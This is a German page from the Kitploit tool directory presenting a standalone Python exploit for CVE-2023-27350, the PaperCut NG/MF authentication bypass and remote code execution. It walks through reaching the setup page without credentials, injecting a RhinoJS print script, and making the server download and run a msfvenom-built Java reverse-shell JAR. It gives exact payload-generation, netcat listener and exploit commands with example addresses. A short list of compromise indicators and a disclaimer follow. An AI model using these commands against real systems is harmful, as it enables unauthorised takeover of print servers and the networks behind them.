Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PaperCut-Authentication_Bypass_and_RCE — Dieser Exploit basiert auf CVE-2023-27350 und wurde auf der Grundlage des ursprünglichen Exploits von horizon3ai und des Metasploit-Moduls erstellt. | Kitploit
Tools/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRemote-Access-Tool
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

Dieser Exploit basiert auf CVE-2023-27350 und wurde auf der Grundlage des ursprünglichen Exploits von horizon3ai und des Metasploit-Moduls erstellt.

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-27350 — PaperCut NG/MF Authentication Bypass & RCE

Eigenständiger Python-Exploit für die kritische Authentication-Bypass- und Remote-Code-Execution-Schwachstelle in PaperCut NG/MF. CVSS 9.8.

Beschreibung

CVE-2023-27350 betrifft PaperCut NG und MF in Versionen vor 20.1.7, 21.2.11 und 22.0.9. Der Fehler erlaubt es einem nicht authentifizierten Angreifer, auf den Endpunkt /app?service=page/SetupCompleted zuzugreifen – eine Einrichtungsseite, die nur während der Erstinstallation erreichbar sein soll – und ohne jegliche Anmeldedaten eine gültige administrative Sitzung zu erhalten.

Mit Admin-Zugriff kann der Angreifer den Druck-Scripting-Mechanismus von PaperCut aktivieren und beliebigen Code injizieren, der von der JVM des Servers ausgeführt wird, was zu vollständigem RCE im Kontext des Dienstbenutzers führt.

Betroffene Versionen

BranchBehobene Version
20.x20.1.7
21.x21.2.11
22.x22.0.9

Versionen 18.x und älter erhielten keinen offiziellen Patch.

Referenzimplementierungen

Dieser Exploit wurde auf Basis der Analyse von zwei öffentlichen Implementierungen entwickelt:

1. horizon3ai/CVE-2023-27350 (Python)

  • Repository: https://github.com/horizon3ai/CVE-2023-27350
  • Ansatz: verwendet Runtime.exec() mit einem einfachen String, um Befehle auszuführen
  • Einschränkungen: Runtime.exec(String) verarbeitet keine Shell-Metazeichen (>&, |, 0>&1), wodurch Reverse-Shell-Payloads wirkungslos sind. Das Skript verwendet außerdem eine fest codierte Drucker-ID (l1001) und prüft nur auf englischsprachige Erfolgsmeldungen, was bei nicht-englischen Instanzen fehlschlägt
  • Falsche Engine-Annahme: berücksichtigt nicht, dass PaperCut RhinoJS (nicht BeanShell) verwendet, was bei bestimmten Java-Payloads zu Syntaxfehlern führt

2. rapid7/metasploit-framework — PaperCutNG Authentication Bypass

  • Modul: exploit/multi/http/papercut_ng_rce
  • Ansatz: lädt ein Metasploit-JAR über URLClassLoader in die JVM und vermeidet damit jede Shell-Abhängigkeit
  • Einschränkungen: erfordert das vollständige Metasploit-Framework und erzeugt einen Java/Meterpreter-Payload; nicht ohne weiteres für den eigenständigen Einsatz mit nc geeignet

Anforderungen

root@kitploit:~
Python 3.x
requests
msfvenom (Teil des Metasploit-Frameworks)
nc (netcat)
root@kitploit:~
pip install requests

Verwendung

1. JAR-Payload erzeugen

root@kitploit:~
msfvenom -p java/shell_reverse_tcp \
  LHOST=<YOUR_IP> LPORT=<SHELL_PORT> \
  -f jar -o payload.jar

2. Listener starten

root@kitploit:~
nc -lvnp <SHELL_PORT>

3. Exploit ausführen

root@kitploit:~
python exploit.py \
  -u http://<TARGET>:9191 \
  -j payload.jar \
  -lh <YOUR_IP> \
  -lp <HTTP_PORT> \
  -rp <SHELL_PORT>

Beispiel:

root@kitploit:~
python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

Parameter

ParameterBeschreibungStandard
-u / --urlPaperCut-Basis-URLerforderlich
-j / --jarPfad zu payload.jarerforderlich
-lh / --lhostIhre IP (das Ziel verbindet sich hierher)erforderlich
-lp / --lportHTTP-Port zum Bereitstellen des JAR9090
-rp / --rportReverse-Shell-Port4444

So funktioniert es

root@kitploit:~
1. Auth-Bypass über /app?service=page/SetupCompleted
        ↓
2. Admin-JSESSIONID ohne Anmeldedaten erlangen
        ↓
3. [Template Printer] (l1001) auswählen
        ↓
4. RhinoJS-Skript in das Druck-Script-Feld injizieren
        ↓
5. Skript erstellt einen URLClassLoader, der auf unseren HTTP-Server zeigt
        ↓
6. PaperCut-JVM lädt payload.jar herunter und führt es aus
        ↓
7. Reverse Shell

Indikatoren für eine Kompromittierung (IoCs)

  • Zugriff auf /app?service=page/SetupCompleted ohne vorherige Sitzung
  • Änderung der Einstellungen print-and-device.script.enabled und print.script.sandboxed (Versionen >= 19)
  • Ausgehende HTTP-Verbindung vom PaperCut-Server zu einer externen IP
  • URLClassLoader-Instanziierung mit einer externen URL in JVM-Logs

Rechtlicher Hinweis

Dieser Exploit dient nur zu Bildungszwecken und zur autorisierten Nutzung (Penetrationstests, CTF, Laborumgebungen). Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Erlaubnis ist illegal. Der Autor ist nicht verantwortlich für jeglichen Missbrauch.

Tool herunterladen